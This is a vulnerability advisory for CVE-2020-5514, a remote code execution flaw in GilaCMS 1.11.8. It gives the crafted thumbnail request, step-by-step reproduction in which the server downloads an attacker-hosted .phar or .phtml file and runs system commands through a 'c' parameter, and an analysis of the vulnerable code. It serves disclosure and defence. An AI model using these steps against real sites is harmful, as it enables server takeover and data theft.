GilaCMS 1.11.8 – Remote Code Execution

Product Owner: GilaCMS

Application Name: GilaCMS 1.11.8

CVE ID: CVE-2020-5514

Type: Installable/Customer-Controlled Application

Application Release Date: 4th December,2019

Severity: Critical

Authentication: Required

Complexity: Easy

Vulnerability Name: Remote Code Execution

Vulnerability Explanation: Remote Code Evaluation is a vulnerability that can be exploited if user input is injected into a File or a String and executed (evaluated) by the programming language’s parser.

Verified In:
Mozilla Firefox 68.2.0esr (64-bit)
Kali Linux 2019.4
Hosted using Apache/2.4.41 (Debian)

Request:
GET /gilacms/lzld/thumb?src={URL_OF_PHP_FILE_TO_UPLOAD}&media_thumb=80 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/gilacms/admin/content/post Connection: close Cookie: GSESSIONID=1pz8sgcaj9w4btmw1lrs07sjpw0tv772n9rf6jkd0wlod37sra; media_tab=assets; media_path=assets; asset_path=src%2Fcore%2Fassets Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

Steps to Reproduce:
1. Login to the GilaCMS application as admin.
2. Go to http://localhost/gila/admin/content/post.
3. Right Click on the thumbnail image and click ‘View Image’

4. From the Image URL we can see that the image path given in ‘src’ parameter is displayed to us.

5. Host an image file in another machine using xampp web server (http://192.168.1.108/poc/)

6. When the ‘src’ parameter is set a remote image URL, the image is displayed to us. Additionally, the same image is downloaded and stored in the /tmp/ and then moved to /tmp/media_thumb/ folder

7. Trying to access the image file directly from the web browser using the absolute path from the webroot, we can see that the image is present and gets displayed.

8. Now setting the ‘src’ parameter to a remote PHP file, the PHP file is downloaded and stored in the /tmp/ but not moved to /tmp/media_thumb/ folder.

9. Trying to access the PHP file directly from the web browser, we get a ‘Forbidden’ error. That is because of the .htaccess file present in the directory which blocks *.php file.

10. In order to bypass that we can instead upload .phar or .phtml file.

11. On accessing the upload .phar file in a web browser, the PHP code gets executed

12. By passing an additional ‘c’ parameter with the command to execute, we can run system commands.

Note:
The web server configuration should support other extensions such as .phar, .phtml in order for this to be exploited.

Video POC:

Vulnerable Code:
The user input (remote url to the php file) sent in ‘src’ parameter is stored in a variable named ‘file’ (Line No: 31) and passed to a function ‘thumb’ of class ‘view’ (Line No: 35).

The ‘src’ variable which stores the user input is passed to ‘make_thumb’ function of class ‘image’ (Line No: 407) since the check for if the file already exists return false.

The ‘src’ variable is again passed to another function ‘local_path’ (Line No: 15).

The ‘_src’ variable stores the destination location where the file is to be stored (Line No: 171). The output filename is generated from ‘src’ variable replacing certain characters with an ‘_’. The built-in PHP function ‘copy’ is used to copy the contents of the remote file location stored in variable ‘src’ to the local file location stored in ‘_src’ (Line No: 176). No validation/checks are performed on the file being saved to the tmp/ directory.